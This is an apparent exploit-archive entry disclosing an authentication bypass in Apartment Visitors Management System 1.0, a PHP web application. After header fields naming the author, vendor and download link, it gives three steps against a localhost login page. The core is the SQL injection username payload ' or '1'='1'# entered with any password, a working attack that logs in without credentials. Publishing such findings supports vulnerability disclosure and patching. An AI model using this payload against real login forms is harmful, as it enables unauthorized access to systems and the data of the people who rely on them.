Apartment Visitors Management System 1.0 - Authentication Bypass

2020-12-24
ID: 103824
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-12-24 
# Exploit Author:  Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0 
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/avms/index.php
<http://localhost/avms/index.php>*

Step 2 – Enter Username :-   ' or '1'='1'# *

Step 3 -  Enter Password - anything*
1-4-2 (www01)